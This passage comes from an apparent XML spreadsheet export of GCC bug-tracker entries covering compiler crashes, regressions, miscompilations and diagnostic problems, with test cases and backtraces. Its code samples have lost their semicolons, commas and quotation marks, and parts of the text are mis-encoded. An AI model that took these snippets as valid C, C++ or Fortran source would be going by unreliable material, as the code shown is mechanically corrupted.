                    ^~~~~~~~~~~~~~~~~~~~~~~
../../src-trunk/gcc/config/i386/i386.c:10653:13: note: 'sprintf' output between 20 and 343 bytes into a destination of size 32
     sprintf (name __x86.get_pc_thunk.%s reg_names[regno])
     ~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
r256454 is OK and r25646 failed. It may be caused by r256457.</t>
  </si>
  <si>
    <t>GCC-64223</t>
  </si>
  <si>
    <t>same warning repeated twice with same line number</t>
  </si>
  <si>
    <t>gcc (GCC) 4.8.3
Observation:
gcc C compilation outputs same warning twice. Same file and line number
Expectation:
The warning would only be reported once.
$ gcc -Wall -o strstr gcc_warn.c
gcc_warn.c: In function â€˜mainâ€™:
gcc_warn.c:12:5: warning: format â€˜%dâ€™ expects argument of type â€˜intâ€™ but argument 2 has type â€˜off_tâ€™ [-Wformat=]
     printf(stat: %d\n statbuf.st_size)
     ^
gcc_warn.c:12:5: warning: format â€˜%dâ€™ expects argument of type â€˜intâ€™ but argument 2 has type â€˜off_tâ€™ [-Wformat=]
cat gcc_warn.c
#include 
#include 
#include 
#include 
#include 
int main(void)
{
    struct stat statbuf
    printf(stat: %d\n statbuf.st_size)
    return 0
}</t>
  </si>
  <si>
    <t>GCC-3620</t>
  </si>
  <si>
    <t>GCC3.0 optimization on anonymous union causes ICE</t>
  </si>
  <si>
    <t>ICE occurs with the following code and -O option:
--------------------------------------test.cpp
void something(char *)
int main()
{
        union {
                char d[sizeof(int)]
                int ll
        }
        something(d)
        return ll
}
-----------------------------------------------
mak@tetley% gcc -v
Reading specs from /home/users/mak/local/Linux-i686/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../configure --prefix=/home/users/mak/local/Linux-i686
Thread model: single
gcc version 3.0
mak@tetley% g++ -O hoge.cpp
hoge.cpp: In function `int main()':
hoge.cpp:12: Internal compiler error in elimination_effects at reload1.c:2687
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0
Environment:
System: Linux tetley.is.s.u-tokyo.ac.jp 2.2.16-22enterprise #1 SMP Tue Aug 22 16:29:32 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/home/users/mak/local/Linux-i686
How-To-Repeat:
       See description.</t>
  </si>
  <si>
    <t>mak</t>
  </si>
  <si>
    <t>GCC-61227</t>
  </si>
  <si>
    <t>[C++11] Regex [\w] does not work</t>
  </si>
  <si>
    <t>Created attachment 32819
Code sample
The attached code produces std::regex_error in g++ 4.9.0.
Here's what debugger says:
Debugger name and version: GNU gdb (GDB) 7.6.2 (Debian 7.6.2-1.1)
In __cxa_throw () (/usr/lib/x86_64-linux-gnu/libstdc++.so.6)
#2  0x0000000000410380 in std::__detail::_Compiler &gt;::_M_expression_term (this=0x7fffffffe3f0 __matcher=...) at /usr/include/c++/4.9/bits/regex_compiler.tcc:455
/usr/include/c++/4.9/bits/regex_compiler.tcc:455:13755:beg:0x410380
At /usr/include/c++/4.9/bits/regex_compiler.tcc:455</t>
  </si>
  <si>
    <t>lyberta</t>
  </si>
  <si>
    <t>GCC-22018</t>
  </si>
  <si>
    <t>[4.1 Regression] VRP miscompiles multiply</t>
  </si>
  <si>
    <t>The following should not abort at any optimization level but does at -O2:
void abort (void)
void g(int)
void f(int l)
{
  unsigned i
  for (i = 0 i &lt; l i++)
    {
      int y = i
      int z = y*-32
      g(z)
    }
}
void g(int i)
{
  static int x = 0
  if (i == 0)
    x ++
  if (x &gt; 1)
    abort ()
}
int main(void)
{
  f(3)
  return 0
}
This is reduced from the message at:
.</t>
  </si>
  <si>
    <t>GCC-60131</t>
  </si>
  <si>
    <t>[4.9 Regression] RTL check fail in rhs_regno</t>
  </si>
  <si>
    <t>Created attachment 32095
gzipped C++ source code
I just compiled the attached code with gcc trunk dated 20140209 on a x86_64
box with flag -O2 and it said
/home/dcb/clang/llvm/lib/Target/R600/SIInstrInfo.cpp: In member function â€˜const llvm::TargetRegister
Class* llvm::SIInstrInfo::getOpRegClass(const llvm::MachineInstr&amp; unsigned int) constâ€™:
/home/dcb/clang/llvm/lib/Target/R600/SIInstrInfo.cpp:467:1: internal compiler error: RTL check: expe
cted code 'reg' have 'sign_extend' in rhs_regno at rtl.h:1125
 }
 ^
0xd530c7 rtl_check_failed_code1(rtx_def const* rtx_code char const* int char const*)
	../../src/trunk/gcc/rtl.c:773
0x6145f2 rhs_regno
	../../src/trunk/gcc/rtl.h:1125
0x167748b rhs_regno
	../../src/trunk/gcc/ree.c:388
0x167748b combine_reaching_defs
	../../src/trunk/gcc/ree.c:703
0x16781e2 find_and_remove_re
	../../src/trunk/gcc/ree.c:997
0x16781e2 rest_of_handle_ree
	../../src/trunk/gcc/ree.c:1068
0x16781e2 execute
	../../src/trunk/gcc/ree.c:1107
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The gcc trunk has been bootstrapped with --enable-check=rtl switched on.</t>
  </si>
  <si>
    <t>GCC-52443</t>
  </si>
  <si>
    <t>ICE: verify_gimple failed: invalid types in nop conversion</t>
  </si>
  <si>
    <t>extern void bar (const __memx void*)
void func (char a)
{
    bar (a)
}
const __memx void* func2 (char a)
{
    return a
}
&gt;&gt; avr-gcc ice-memx.c -S -w
ice-memx.c: In function 'func2':
ice-memx.c:8:20: error: invalid types in nop conversion
const  void *
long int
D.1326 = (const  void *) D.1327
ice-memx.c:8:20: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
Target: avr
Configured with: ../gcc-trunk/configure --with-gmp=/usr/local --prefix=/usr/local/avr --target=avr --enable-languages=cc++ --with-dwarf2 --disable-shared --disable-libada --disable-libssp --disable-nls
Thread model: single
gcc version 4.7.0 20120217 (experimental) (GCC) 
GNU C (GCC) version 4.7.0 20120217 (experimental) (avr)
	compiled by GNU C version 4.6.2 GMP version 5.0.4 MPFR version 3.1.0 MPC version 0.9
I can also see the error on a build from 2012-02-28.</t>
  </si>
  <si>
    <t>GCC-50880</t>
  </si>
  <si>
    <t>__complex_acosh() picks wrong complex branch</t>
  </si>
  <si>
    <t>According to the C++ standard acosh(complex) should behave just like C99's cacosh(T complex) function. There the branch cut is at values less than 1 along the real axis and the range of a half-strip of non-negative values along the real axis and in the interval [-i*pi+i*pi] along the imaginary axis.
The implementation in tr1/complex gets this wrong. The result returned by __complex_acosh() are all wrong in the lower complex plain. It can be easily fixed. I'm attaching a patch.</t>
  </si>
  <si>
    <t>kreckel</t>
  </si>
  <si>
    <t>GCC-81744</t>
  </si>
  <si>
    <t>[8 Regression] ICE: verify_ssa failed at tree-ssa.c:1186</t>
  </si>
  <si>
    <t>Created attachment 41942
Preprocessed output created with -freport-bug
[jamrial@ArchVM ~]$ gcc -fno-math-errno -O3 -c ccV0zFt3.i
src/libavfilter/af_compand.c: In function â€˜config_outputâ€™:
src/libavfilter/af_compand.c:328:12: error: definition in block 78 follows the use
for SSA_NAME: _519 in statement:
_126 = _519 + 4294967291
during GIMPLE pass: pcom
src/libavfilter/af_compand.c:328:12: internal compiler error: verify_ssa failed
0xdb534b verify_ssa(bool bool)
        /home/jamrial/gcc-svn/gcc/tree-ssa.c:1186
0xa99527 execute_function_todo
        /home/jamrial/gcc-svn/gcc/passes.c:1997
0xa9a442 execute_todo
        /home/jamrial/gcc-svn/gcc/passes.c:2044
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[jamrial@ArchVM ~]$ gcc -fno-math-errno -fno-tree-vectorize -O3 -c ccV0zFt3.i
src/libavfilter/af_compand.c: In function â€˜config_outputâ€™:
src/libavfilter/af_compand.c:328:12: error: definition in block 83 follows the use
for SSA_NAME: _618 in statement:
_611 = _618 + 4294967291
during GIMPLE pass: pcom
src/libavfilter/af_compand.c:328:12: internal compiler error: verify_ssa failed
0xdb534b verify_ssa(bool bool)
        /home/jamrial/gcc-svn/gcc/tree-ssa.c:1186
0xa99527 execute_function_todo
        /home/jamrial/gcc-svn/gcc/passes.c:1997
0xa9a442 execute_todo
        /home/jamrial/gcc-svn/gcc/passes.c:2044
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Doesn't crash if i remove either -fno-math-errno or -O3. Adding -fno-tree-vectorize only changes the contents of the SSA_NAME error.
This seems to be a regression introduced sometime during the past week.</t>
  </si>
  <si>
    <t>amker</t>
  </si>
  <si>
    <t>jamrial</t>
  </si>
  <si>
    <t>GCC-15245</t>
  </si>
  <si>
    <t>[tree-ssa] ICE  in Invalid operand to unary operator / verify_stmts</t>
  </si>
  <si>
    <t>/home/marcus/projects/gcc/BIN/bin/gcc  -v -O2 -c testcase.i  
Konfiguriert mit: /home/marcus/projects/gcc/configure --prefix=/home/marcus/
projects/gcc/BIN/ 
Thread-Modell: posix 
gcc-Version 3.5-tree-ssa 20040421 (merged 20040414) 
 /home/marcus/projects/gcc/BIN/bin/../libexec/gcc/
i686-pc-linux-gnu/3.5-tree-ssa/cc1 -fpreprocessed testcase.i -quiet -dumpbase 
testcase.i -mtune=pentiumpro -auxbase testcase -O2 -version -o /tmp/ccqJJzWq.s 
GNU C version 3.5-tree-ssa 20040421 (merged 20040414) (i686-pc-linux-gnu) 
        compiled by GNU C version 3.5-tree-ssa 20040421 (merged 20040414). 
GGC-Heuristik: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
testcase.i: In function `f': 
testcase.i:2: Fehler: Invalid operand to unary operator 
(int)T.1_8 
testcase.i:2: interner Compiler-Fehler: verify_stmts failed. 
Please submit a full bug report 
with preprocessed source if appropriate. 
Slightly illegal code in attached testcase.</t>
  </si>
  <si>
    <t>GCC-53185</t>
  </si>
  <si>
    <t>[4.8 Regression] segmentation fault in vectorizable_load</t>
  </si>
  <si>
    <t>Created attachment 27280
script to demonstrate compiler segfault
GCC 4.8 trunk revision r187034 encounters a segfault when compiling the attached test case.  This appears to be a relatively recent regression.
Here's the back trace.
Program received signal SIGSEGV Segmentation fault.
0x0000000000d93153 in vectorizable_load (stmt=0x7ffff1889460
    gsi=0x7fffffffd680 vec_stmt=0x7fffffffd5a0 slp_node=0x0
    slp_node_instance=0x0)
    at gcc/tree-vect-stmts.c:4563
4563          ivstep = fold_build2 (MULT_EXPR TREE_TYPE (ivstep) ivstep
(gdb) where
#0  0x0000000000d93153 in vectorizable_load (stmt=0x7ffff1889460
    gsi=0x7fffffffd680 vec_stmt=0x7fffffffd5a0 slp_node=0x0
    slp_node_instance=0x0)
    at gcc/tree-vect-stmts.c:4563
#1  0x0000000000d978e4 in vect_transform_stmt (stmt=0x7ffff1889460
    gsi=0x7fffffffd680 grouped_store=0x7fffffffd677  slp_node=0x0
    slp_node_instance=0x0)
    at gcc/tree-vect-stmts.c:5639
#2  0x0000000000dac324 in vect_transform_loop (loop_vinfo=0x1cd0630)
    at gcc/tree-vect-loop.c:5461
#3  0x0000000000dbfd08 in vectorize_loops ()
    at gcc/tree-vectorizer.c:214
#4  0x0000000000cbf6b4 in tree_vectorize ()
    at gcc/tree-ssa-loop.c:218
#5  0x0000000000a22eb0 in execute_one_pass (pass=0x19fdc40)
    at gcc/passes.c:2181
#6  0x0000000000a23096 in execute_pass_list (pass=0x19fdc40)
    at gcc/passes.c:2236
#7  0x0000000000a230b7 in execute_pass_list (pass=0x19fda60)
    at gcc/passes.c:2237
To reproduce copy the attached do-fail script and gasnet_core.i file to the gcc build directory and run do-fail.
The compiler was configured with --disable-bootstrap --disable-multilib and --enable-checking however the failure occurred after a full bootstrap and with various other configure switches as well.</t>
  </si>
  <si>
    <t>GCC-46770</t>
  </si>
  <si>
    <t>Replace .ctors/.dtors with .init_array/.fini_array on targets supporting them</t>
  </si>
  <si>
    <t>Considering .init_array/.fini_array has been supported by glibc for 11 years ( http://sourceware.org/git/?p=glibc.gita=commitdiffh=fcf70d4114db9ff7923f5dfeb3fea6e2d623e5c2hp=3f3822198993be18d4d9ccb1593eea274dbd2ba0 ) it would make sense to use these instead of .ctors/.dtors on systems supporting them.</t>
  </si>
  <si>
    <t>GCC-61036</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] shared_ptr(new T) rejected</t>
  </si>
  <si>
    <t>shared_ptr(new int) is valid but I made a stupid typo in a static assertion</t>
  </si>
  <si>
    <t>GCC-63419</t>
  </si>
  <si>
    <t>verify_gimple failed: vector CONSTRUCTOR element is not a GIMPLE value</t>
  </si>
  <si>
    <t>Created attachment 33624
gzipped C++ source code
Attached code when compiled by 20140927 with flag -O2
does the following
$ ../results/bin/gcc -c -O2 bug165.cc
In file included from /home/dcb/rpmbuild/BUILD/eigen-eigen-1306d75b4a21/Eigen/Core:294:0
                 from /home/dcb/rpmbuild/BUILD/eigen-eigen-1306d75b4a21/Eigen/Dense:1
                 from /home/dcb/rpmbuild/BUILD/eigen-eigen-1306d75b4a21/doc/examples/Tutorial_ArrayClass_interop.cpp:1:
/home/dcb/rpmbuild/BUILD/eigen-eigen-1306d75b4a21/Eigen/src/Core/Matrix.h: In constructor â€˜Eigen::Matrix::Matrix(const Eigen::MatrixBase _Scalar = float int _Rows = -1 int _Cols = -1 int _Options = 0 int _MaxRows = -1 int _MaxCols = -1]â€™:
/home/dcb/rpmbuild/BUILD/eigen-eigen-1306d75b4a21/Eigen/src/Core/Matrix.h:272:12: error: vector CONSTRUCTOR element is not a GIMPLE value
     EIGEN_STRONG_INLINE Matrix(const MatrixBase&amp; other)
            ^
{(float) pretmp_197 (float) pretmp_197 (float) pretmp_197 (float) pretmp_197}
                                                                                  10-1         Top</t>
  </si>
  <si>
    <t>GCC-68218</t>
  </si>
  <si>
    <t>ALLOCATE with size given by a module function</t>
  </si>
  <si>
    <t>Calling ALLOCATE with an array size that is given by a function argument results in multiple calls of this function.
This issue is present (at least) on gfortran versions 4.7 ... 5
The following program unintentionally calls nquery() four times:
MODULE mo_test
CONTAINS
  FUNCTION nquery()
    INTEGER :: nquery
    WRITE (0*) hello!
    nquery = 1
  END FUNCTION nquery
END MODULE mo_test
! ----------------------------------------------------------------------
! MAIN PROGRAM
! ----------------------------------------------------------------------
PROGRAM example
   USE mo_test
   INTEGER ALLOCATABLE :: query_buf(:)
   ALLOCATE(query_buf(nquery()))
END PROGRAM example</t>
  </si>
  <si>
    <t>ysheofue</t>
  </si>
  <si>
    <t>GCC-82651</t>
  </si>
  <si>
    <t>After r253879 GCC 8.0 can't build cross compiler for mingw32</t>
  </si>
  <si>
    <t>-r 253878 works OK (for mingw32) -r 253879 breaks build cross compiler with error:
g++ -fno-PIE -c   -pipe -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -I. -I/home/ma/m/source/gcc-8/gcc -I/home/ma/m/source/gcc-8/gcc/. -I/home/ma/m/source/gcc-8/gcc/../include -I/home/ma/m/source/gcc-8/gcc/../libcpp/include -I/home/ma/m/build/for_cross/include -I/home/ma/m/build/for_cross/include -I/home/ma/m/build/for_cross/include  -I/home/ma/m/source/gcc-8/gcc/../libdecnumber -I/home/ma/m/source/gcc-8/gcc/../libdecnumber/bid -I../libdecnumber -I/home/ma/m/source/gcc-8/gcc/../libbacktrace -I/home/ma/m/build/for_cross/include  -o gimplify.o -MT gimplify.o -MMD -MP -MF ./.deps/gimplify.TPo /home/ma/m/source/gcc-8/gcc/gimplify.c
In file included from ./tm.h:20:0
                 from /home/ma/m/source/gcc-8/gcc/backend.h:28
                 from /home/ma/m/source/gcc-8/gcc/gimplify.c:26:
/home/ma/m/source/gcc-8/gcc/gimplify.c: In function â€˜gimplify_status gimplify_decl_expr(tree_node** gimple**)â€™:
/home/ma/m/source/gcc-8/gcc/config/i386/i386.h:609:61: error: â€˜ix86_cfun_abiâ€™ was not declared in this scope
 #define TARGET_64BIT_MS_ABI (TARGET_64BIT &amp;&amp; ix86_cfun_abi () == MS_ABI)
                                                             ^
/home/ma/m/source/gcc-8/gcc/config/i386/cygming.h:35:22: note: in expansion of macro â€˜TARGET_64BIT_MS_ABIâ€™
 #define TARGET_SEH  (TARGET_64BIT_MS_ABI &amp;&amp; flag_unwind_tables)
                      ^
/home/ma/m/source/gcc-8/gcc/config/i386/cygming.h:40:31: note: in expansion of macro â€˜TARGET_SEHâ€™
 #define MAX_STACK_ALIGNMENT  (TARGET_SEH ? 128 : MAX_OFILE_ALIGNMENT)
                               ^
/home/ma/m/source/gcc-8/gcc/defaults.h:1142:39: note: in expansion of macro â€˜MAX_STACK_ALIGNMENTâ€™
 #define MAX_SUPPORTED_STACK_ALIGNMENT MAX_STACK_ALIGNMENT
                                       ^
/home/ma/m/source/gcc-8/gcc/gimplify.c:1659:28: note: in expansion of macro â€˜MAX_SUPPORTED_STACK_ALIGNMENTâ€™
    &amp;&amp; DECL_ALIGN (decl) &lt;= MAX_SUPPORTED_STACK_ALIGNMENT
                            ^
/home/ma/m/source/gcc-8/gcc/gimplify.c: In function â€˜gimplify_status gimplify_target_expr(tree_node** gimple** gimple**)â€™:
/home/ma/m/source/gcc-8/gcc/config/i386/i386.h:609:61: error: â€˜ix86_cfun_abiâ€™ was not declared in this scope
 #define TARGET_64BIT_MS_ABI (TARGET_64BIT &amp;&amp; ix86_cfun_abi () == MS_ABI)
                                                             ^
/home/ma/m/source/gcc-8/gcc/config/i386/cygming.h:35:22: note: in expansion of macro â€˜TARGET_64BIT_MS_ABIâ€™
 #define TARGET_SEH  (TARGET_64BIT_MS_ABI &amp;&amp; flag_unwind_tables)
                      ^
/home/ma/m/source/gcc-8/gcc/config/i386/cygming.h:40:31: note: in expansion of macro â€˜TARGET_SEHâ€™
 #define MAX_STACK_ALIGNMENT  (TARGET_SEH ? 128 : MAX_OFILE_ALIGNMENT)
                               ^
/home/ma/m/source/gcc-8/gcc/defaults.h:1142:39: note: in expansion of macro â€˜MAX_STACK_ALIGNMENTâ€™
 #define MAX_SUPPORTED_STACK_ALIGNMENT MAX_STACK_ALIGNMENT
                                       ^
/home/ma/m/source/gcc-8/gcc/gimplify.c:6510:32: note: in expansion of macro â€˜MAX_SUPPORTED_STACK_ALIGNMENTâ€™
        &amp;&amp; DECL_ALIGN (temp) &lt;= MAX_SUPPORTED_STACK_ALIGNMENT
                                ^
Makefile:1104: recipe for target 'gimplify.o' failed
make[1]: *** [gimplify.o] Error 1
make[1]: Leaving directory '/home/ma/m/build/bc_gcc/gcc'
Makefile:4285: recipe for target 'all-gcc' failed
make: *** [all-gcc] Error 2</t>
  </si>
  <si>
    <t>GCC-46543</t>
  </si>
  <si>
    <t>libquadmath: Add documentation</t>
  </si>
  <si>
    <t>If the library should be used by everyone we need to document which functions (= interface) it provides.</t>
  </si>
  <si>
    <t>GCC-71648</t>
  </si>
  <si>
    <t>C++ ICE on ppc64 with -m64</t>
  </si>
  <si>
    <t>$ g++-6 -m64 -O2 -c testcase2.cpp 
testcase2.cpp: In function â€˜void x33()â€™:
testcase2.cpp:55:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 40 39 41 2 (set (reg:DI 63 31 [orig:157 _6 ] [157])
        (reg:DI 9 9)) testcase2.cpp:44 549 {*movdi_internal64}
     (nil))
testcase2.cpp:55:1: internal compiler error: in extract_constrain_insn at recog.c:2190
0x107077ff _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:108
0x10707833 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:119
0x106d5be7 extract_constrain_insn(rtx_insn*)
        ../../src/gcc/recog.c:2190
0x106da11f copyprop_hardreg_forward_1
        ../../src/gcc/regcprop.c:774
0x106db59f copyprop_hardreg_forward_bb_without_debug_insn(basic_block_def*)
        ../../src/gcc/regcprop.c:1152
0x107493bf prepare_shrink_wrap
        ../../src/gcc/shrink-wrap.c:440
0x107493bf try_shrink_wrapping(edge_def** bitmap_head* rtx_insn*)
        ../../src/gcc/shrink-wrap.c:646
0x104f0c7b thread_prologue_and_epilogue_insns()
        ../../src/gcc/function.c:6066
0x104f1757 rest_of_handle_thread_prologue_and_epilogue
        ../../src/gcc/function.c:6588
0x104f1757 execute
        ../../src/gcc/function.c:6630
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>markos</t>
  </si>
  <si>
    <t>GCC-34526</t>
  </si>
  <si>
    <t>no-altivec ABI should be fixed or no longer be the default</t>
  </si>
  <si>
    <t>This PR is meant to be a central place to record information about this issue.
The default ABI for 32-bit PowerPC GNU/Linux does not pass vectors in AltiVec registers and does not save and restore AltiVec registers in functions that use those registers.  With -mabi=altivec vectors are passed in AltiVec registers and AltiVec registers used within a function are saved and restored.  This has always been a problem if multiple functions in a call chain use AltiVec registers without the AltiVec ABI but it's become a more visible issue with -ftree-vectorize included in -O3 particularly when the user specifies a CPU that supports AltiVec and might not realize that those two options imply that AltiVec registers will likely be used in multiple functions in a call stack without saving and restoring them.
Two recent PRs that are due to this problem are 34038 and 34437.  A somewhat-rel
ated PR is 33899.
There were some recent discussions of this issue:
  http://gcc.gnu.org/ml/gcc-patches/2007-07/msg02159.html
  http://gcc.gnu.org/ml/gcc-patches/2007-08/msg00438.html
This ought to be fixed either by using the AltiVec ABI by default or by changing the non-AltiVec ABI to save and restore AltiVec registers in functions that use them.</t>
  </si>
  <si>
    <t>GCC-80052</t>
  </si>
  <si>
    <t>typo in aarch64.opt: dummping</t>
  </si>
  <si>
    <t>from aarch64.opt:
    Enables verbose cost model dummping in the debug dump files.
s/dummping/dumping/
In the same commit a typo was introduced into ChangeLog which is now ChangeLog-2016: the file says PInski which should be Pinski.</t>
  </si>
  <si>
    <t>GCC-5622</t>
  </si>
  <si>
    <t>ICEs due to host_integerp not checked before tree_cst_low</t>
  </si>
  <si>
    <t>If using 32-bit HOST_WIDE_INT compiling:
struct A
{
}
struct B : public A
{
  char b[0x10000000]
} e
causes ICE because layout_virtual_base does arithmetic
on bitsizes in HOST_WIDE_INT not on trees.
Release:
gcc-3.1 20020207
Environment:
i386-redhat-linux</t>
  </si>
  <si>
    <t>GCC-18950</t>
  </si>
  <si>
    <t>specialization of template class with inner template members</t>
  </si>
  <si>
    <t>The following code used to compile fine with gcc 3.3 (linux x86) but
doesn't anymore with gcc 3.4 (just as a hint it seems to compile fine
with Comeau) :
template
class Class
{
public:
   template T2 function( T2 param )
}
template
template
T2 Class::function( T2 param )
{ // line 11
        return param * N2
}
int main()
{
        Class instance
        return instance.function( 12 )
}
  This produces the following output:
test-gcc34.cpp:11: error: template-id `function' for `T2 Class&lt;int
   1&gt;::function(T2)' does not match any template declaration
test-gcc34.cpp:11: error: erreur de syntaxe before `{' token
  It works if we add the specialized declaration of the class Class:
template
class Class
{
public:
   template T2 function( T2 param )
}
  but this can be painful if Class contains a lot more members.
  It also works if function is only templated by one argument :
template
template
T2 Class::function( T2 param )
{ // line 11
        return param * 2
}
  Thanks.</t>
  </si>
  <si>
    <t>GCC-17851</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Misleading diagnostic for invalid function declarations with undeclared types</t>
  </si>
  <si>
    <t>Since gcc 3.4.0 I get an error message which is not very helpful for the
following invalid code snippet:
================================
struct A
{
    int operator[] (size_t)
}
struct B
{
    int foo(size_t)
}
================================
err.cc:3: error: declaration of `operator[]' as non-function
err.cc:3: error: expected `' before '(' token
err.cc:8: error: expected `' before '(' token
With gcc 3.3.5 and before I get:
err.cc:3: error: `size_t' was not declared in this scope
err.cc:3: error: invalid data member initialization
err.cc:3: error: (use `=' to initialize static data members)
err.cc:3: error: declaration of `operator[]' as non-function
err.cc:8: error: `size_t' was not declared in this scope
err.cc:8: error: invalid data member initialization
which says what's wrong: `size_t' was not declared in this scope.</t>
  </si>
  <si>
    <t>GCC-31715</t>
  </si>
  <si>
    <t>[4.3 Regression] Array calculation done incorrectly</t>
  </si>
  <si>
    <t>following sample testcsae misdetects an array overflow
/home/marcus/projects/gcc/BIN/bin/gcc  -c   -O2 -Wall  x.i 
x.i: In function 'f':
x.i:7: warning: array subscript is above array bounds</t>
  </si>
  <si>
    <t>GCC-71204</t>
  </si>
  <si>
    <t>[5/6/7 Regression] ICE with -O0 in expand_expr_real_1 at expr.c:9651</t>
  </si>
  <si>
    <t>Full reduction and simplification from a production code base
results in the following reproducer aborting at -O0 :
$ cat z1.f90
module m
   character(10) allocatable :: z(:)
end module
subroutine s1
   use m
   z(2) = z(1)
end
subroutine s2
   use m
   z(2) = z(1)
end
$ gfortran-6 --version
GNU Fortran (SUSE Linux) 6.1.1 20160502 [gcc-6-branch revision 235698]
$ gfortran-6 -O2 -c z1.f90
$ gfortran-6 -O1 -c z1.f90
$ gfortran-6 -O0 -c z1.f90
z1.f90:12:0:
    z(2) = z(1)
internal compiler error: in expand_expr_real_1 at expr.c:9651</t>
  </si>
  <si>
    <t>GCC-82600</t>
  </si>
  <si>
    <t>[8 Regression] Address of local variable returned [-Werror=return-local-addr] when building mozilla-central</t>
  </si>
  <si>
    <t>Building firefox with gcc8 trunk i get this error:
In file included from /root/firefox-gcc-last/obj-x86_64-pc-linux-gnu/memory/build/Unified_cpp_memory_build0.cpp:2:0:
 /root/firefox-gcc-last/memory/build/mozjemalloc.cpp: In member function 'void** AddressRadixTree::GetSlot(void* bool)':
 /root/firefox-gcc-last/memory/build/mozjemalloc.cpp:1695:10: error: address of local variable 'node' returned [-Werror=return-local-addr]
    void** node
           ^~~~
 cc1plus: all warnings being treated as errors
The entire context can be found here:
[1] http://searchfox.org/mozilla-central/rev/a984558fa2bbde6492d3fb918496fc0b0835b2ce/memory/build/mozjemalloc.cpp#1721
[2] http://searchfox.org/mozilla-central/rev/a984558fa2bbde6492d3fb918496fc0b0835b2ce/memory/build/mozjemalloc.cpp#1698 It can easily be seen that by just analysing [2] 'node' only points somewhere in 'mRoot'.</t>
  </si>
  <si>
    <t>andi</t>
  </si>
  <si>
    <t>GCC-51812</t>
  </si>
  <si>
    <t>[4.7 regression] Virtual public inheritance and thunks leads to undefined reference in header files.</t>
  </si>
  <si>
    <t>Created attachment 26292
The c++ file that has linker errors.
Hi
Using gcc 4.7 causes new linker errors that are not present in e.g. 4.5 4.6 or clang.  These linker errors make it impossible to use header files that do not fully define some classes entirely in the header file.  
The errors look like:
% g++-4.7 all5.C 
/tmp/ccfEMWL0.o: In function `Object::print() const':
all5.C:(.text._ZNK6Object5printEv[_ZNK6Object5printEv]+0x58): undefined reference to `demangle(std::string const&amp;)'
/tmp/ccfEMWL0.o: In function `alphabet::compare(Object const&amp;) const':
all5.C:(.text._ZNK8alphabet7compareERK6Object[_ZNK8alphabet7compareERK6Object]+0x81): undefined reference to `typeinfo for alphabet'
all5.C:(.text._ZNK8alphabet7compareERK6Object[_ZNK8alphabet7compareERK6Object]+0xa5): undefined reference to `operator==(alphabet const&amp; alphabet const&amp;)'
/tmp/ccfEMWL0.o: In function `alphabet::~alphabet()':
all5.C:(.text._ZN8alphabetD1Ev[_ZN8alphabetD1Ev]+0xe): undefined reference to `vtable for alphabet'
all5.C:(.text._ZN8alphabetD1Ev[_ZN8alphabetD1Ev]+0x26): undefined reference to `vtable for alphabet'
/tmp/ccfEMWL0.o: In function `Triplets::Triplets(Triplets const&amp;)':
all5.C:(.text._ZN8TripletsC1ERKS_[_ZN8TripletsC1ERKS_]+0x3d): undefined reference to `VTT for Triplets'
all5.C:(.text._ZN8TripletsC1ERKS_[_ZN8TripletsC1ERKS_]+0x51): undefined reference to `vtable for Triplets'
all5.C:(.text._ZN8TripletsC1ERKS_[_ZN8TripletsC1ERKS_]+0x69): undefined reference to `vtable for Triplets'
/tmp/ccfEMWL0.o:(.rodata._ZTV18AminoAcidsWithStop[_ZTV18AminoAcidsWithStop]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTV18AminoAcidsWithStop[_ZTV18AminoAcidsWithStop]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTV18AminoAcidsWithStop[_ZTV18AminoAcidsWithStop]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_10AminoAcids[_ZTV18AminoAcidsWithStop]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_10AminoAcids[_ZTV18AminoAcidsWithStop]+0x60): undefined reference to `alphabet::setup_letter_classes()'
/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_10AminoAcids[_ZTV18AminoAcidsWithStop]+0x70): undefined reference to `alphabet::get_frequencies_from_counts(std::valarray const&amp; double) const'
/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_8alphabet[_ZTV18AminoAcidsWithStop]+0x30): undefined reference to `typeinfo for alphabet'
/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_8alphabet[_ZTV18AminoAcidsWithStop]+0x48): undefined reference to `alphabet::print() const'
/tmp/ccfEMWL0.o:(.rodata._ZTC18AminoAcidsWithStop0_8alphabet[_ZTV18AminoAcidsWithStop]+0x60): undefined reference to `alphabet::setup_letter_classes()'
